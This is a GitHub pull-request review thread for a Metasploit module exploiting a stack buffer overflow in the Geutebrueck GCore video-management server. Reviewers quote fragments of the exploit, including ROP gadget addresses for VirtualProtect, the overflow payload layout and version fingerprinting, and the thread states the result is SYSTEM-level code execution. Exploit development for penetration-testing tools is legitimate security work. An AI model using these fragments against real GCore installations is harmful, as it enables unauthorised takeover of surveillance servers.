Added Geutebrueck GCore Remote Code Execution for 1.3.8.42 and 1.4.2.37 #8747
Conversation
m4p0
changed the title
| # Current source: https://github.com/rapid7/metasploit-framework | ||
| ## | ||
|
|
||
| require 'msf/core' |
There was a problem hiding this comment.
You don't need to require msf/core
| ## | ||
|
|
||
| require 'msf/core' | ||
| require 'nokogiri' |
There was a problem hiding this comment.
You don't need to require nokogiri
| ], | ||
| 'References' => | ||
| [ | ||
| ['www.geutebrueck.com', ''] |
There was a problem hiding this comment.
Invalid format. Please use:
['EBD', '41153'],
['URL', 'https://packetstormsecurity.com/files/140762/geutebrueck-overflow.rb.txt']And add any other references to the advisory, PoC or exploit if available.
| { | ||
| 'Space' => '2000' | ||
| }, | ||
| 'Privileged' => false, |
There was a problem hiding this comment.
If the exploit results in SYSTEM then use 'Privileged' => true
| 'Space' => '2000' | ||
| }, | ||
| 'Privileged' => false, | ||
| 'DisclosureDate' => '2017-01-24', |
There was a problem hiding this comment.
Invalid date format.
Please run ./tools/dev/msftidy.rb modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb over the module.
| elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") | ||
| ensure | ||
| print_status('Closing socket.') | ||
| disconnect |
There was a problem hiding this comment.
If you use Msf::Exploit::Remote::HttpClient then you don't need to disconnect here.
| print_status("Selected version: #{self.target.name}") | ||
| target_rop, target_overwrite, target_stack_align = ropchain(self.target) | ||
| begin | ||
| connect |
There was a problem hiding this comment.
If you use Msf::Exploit::Remote::HttpClient then you don't need to connect here.
| else | ||
| target_rop, target_overwrite, target_stack_align = ropchain(target) | ||
| begin | ||
| connect |
There was a problem hiding this comment.
If you use Msf::Exploit::Remote::HttpClient then you don't need to connect here.
|
|
||
| exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align | ||
| print_status('Exploit ready for sending...') | ||
| sock.put(exploit, 'Timeout' => 20) |
There was a problem hiding this comment.
Use send_request_cgi instead.
|
|
||
| exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align | ||
| print_status('Exploit ready for sending...') | ||
| sock.put(exploit, 'Timeout' => 20) |
There was a problem hiding this comment.
Use send_request_cgi instead.
Review changes with msftidy.
|
|
||
| def fingerprint | ||
| print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') | ||
| @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) |
There was a problem hiding this comment.
This module was used due the improper handling of the http request by the webserver which were written by the vendor.
|
@m4p0 any status on the documentation? |
|
@h00die I'll take care of the documentation. I can't provide a vulnerable application. |
|
would you be able to supply a pcap of exploitation (feel free to sanitize)? If you can get docs, a pcap, and 2 space, i should be able to look at it in the next few days and hopefully get this landed! |
|
@h00die I'm checking if I can give a link to an application or a pcap. But I will add this as soon as possible. |
| 'Privileged' => true, | ||
| 'DisclosureDate' => 'Jan 24 2017', | ||
| 'DefaultTarget' => 0)) | ||
| end |
There was a problem hiding this comment.
You can set the default port to avoid needing to set it at exploitation time. See
| end | ||
|
|
||
| def fingerprint | ||
| print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') |
There was a problem hiding this comment.
Change to:
print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...")
|
|
||
| def fingerprint | ||
| print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') | ||
| @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) |
There was a problem hiding this comment.
"http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"
| return Exploit::CheckCode::Appears, mytarget | ||
| end | ||
| end | ||
| print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') |
There was a problem hiding this comment.
Change to:
print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.")
| end | ||
| end | ||
| print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') | ||
| print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") |
| rop += [0x0000000000000400].pack('Q<') | ||
|
|
||
| # 0x140a88f81: | POP R8; RET | ||
| # 0x...40 | Value for VP "Execute Permissions" |
There was a problem hiding this comment.
Just wanted to say that I appreciate all the comments you've put in here explaining each thing. Very nice!
| end | ||
|
|
||
| def exploit | ||
| if target['auto'] |
There was a problem hiding this comment.
unless im not looking close enough it looks there is minimal difference between auto and target selected areas of code here. It looks like if its auto, you check and then handle if its not vuln. From that point on, looks to be no changes, so we can most likely shorten up the code by bombing out on unknown.
I think this could really be something like (pseudo code)
if target['auto']
checkcode, self.target = fingerprint
fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown'
end
target_rop, target_overwrite, target_stack_align = ropchain(self.target)
[throw exploit with rescue and ensure areas]
|
I think I was able to shorten the code. Thank you @h00die. I think we have to startup the whole testing environment to verify that the code is still running as expected. |
|
If you're able to get a PCAP send it to msfdev@metasploit.com and we'll review it, match it to the code, and land this thing |
|
@m4p0 just wanted to check in on this PR |
|
@h00die as heads-up we're on it. We will deliver the rest like the pcap and tests for the working code during the next week. |
|
@h00die as told yesterday the code fix were made and tested. PCAP was delivered by now. |
| def initialize(info = {}) | ||
| super(update_info(info, | ||
| 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', | ||
| 'Description' => 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).', |
There was a problem hiding this comment.
Can you multiline this. See https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/altn_webadmin.rb#L14 as an example (or pretty much every module)
| 'References' => | ||
| [ | ||
| ['EDB','41153'], | ||
| ['URL','www.geutebrueck.com'] |
There was a problem hiding this comment.
Maybe add: ['CVE', '2017-11517']
| 'Targets' => | ||
| [ | ||
| ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], | ||
| ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], |
There was a problem hiding this comment.
You can remove the () parts, or just do (Win7+)
| [ | ||
| ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], | ||
| ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], | ||
| ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}] |
There was a problem hiding this comment.
You can remove the () parts, or just do (Win7+)
| 'DefaultTarget' => 0)) | ||
|
|
||
| register_options( | ||
| [ |
There was a problem hiding this comment.
you can shorten this to [Opt::RPORT(13003)]
| # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; | ||
| rop = '' | ||
| rop += [0x140ccb984].pack('Q<') | ||
| rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; |
| # We want RCX to hold the value for VP Argument "Address of Shellcode" | ||
| # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; | ||
| rop = '' | ||
| rop += [0x140ccb984].pack('Q<') |
| # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. | ||
| # We want RCX to hold the value for VP Argument "Address of Shellcode" | ||
| # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; | ||
| rop = '' |
There was a problem hiding this comment.
This line is the same in both, it could be moved to before the if statement.
| overwrite = target_overwrite | ||
| stack_align = target_stack_align | ||
|
|
||
| exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align |
There was a problem hiding this comment.
Instead of these single use variables here, could we simplify:
exploit = 'GET /'
exploit << "\x41" * 200
exploit << target_rop
exploit << payload.encoded
exploit << "\x41" * 1823
exploit << target_overwrite
exploit << target_stack_align
I'm also assuming you couldn't use the send_request_cgi ? I didn't go back through all the comments, figured it was discussed there and just wanted to make sure it was.
| print_status('Exploit sent!') | ||
| buf = sock.get_once || '' | ||
| rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e | ||
| elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") |
There was a problem hiding this comment.
I would add a fail_with here as well.
|
I checked over the pcap, looks good. One last pass through the code some things were bothering me stylistically. Once those changes are done, i'll land since the functionality is good. |
|
looks good, i'm going to give it one last run through tonight to make sure nothing functionally changed (doesn't look to be) and then give this a merge. |
|
Thanks for your support and patience. I'll def. open a beer when this module is part of metasploit. |
|
go get that beer. |
Release NotesThis module adds an RCE against Geutebrueck GCore. |
|
Thanks again for sticking with this, it took a while, so I (we) appreciate all the work! |
|
\o/ |
|
I had a ninja edit, your spacing was off. 7ad151e |
Geutebrueck_GCore_X64_RCE_BO
Metasploit module for Geutebrueck GCore "video management" system. Tested with version 1.3.8.42 and 1.4.2.37.
Full remote code execution with NT/System privileges on Windows (Win 2012R2,Win8.1,...) with the installed Geutebrueck products (GCore).
Authors:
https://www.infoguard.ch
Luca Cappiello
Maurice Popp
POC: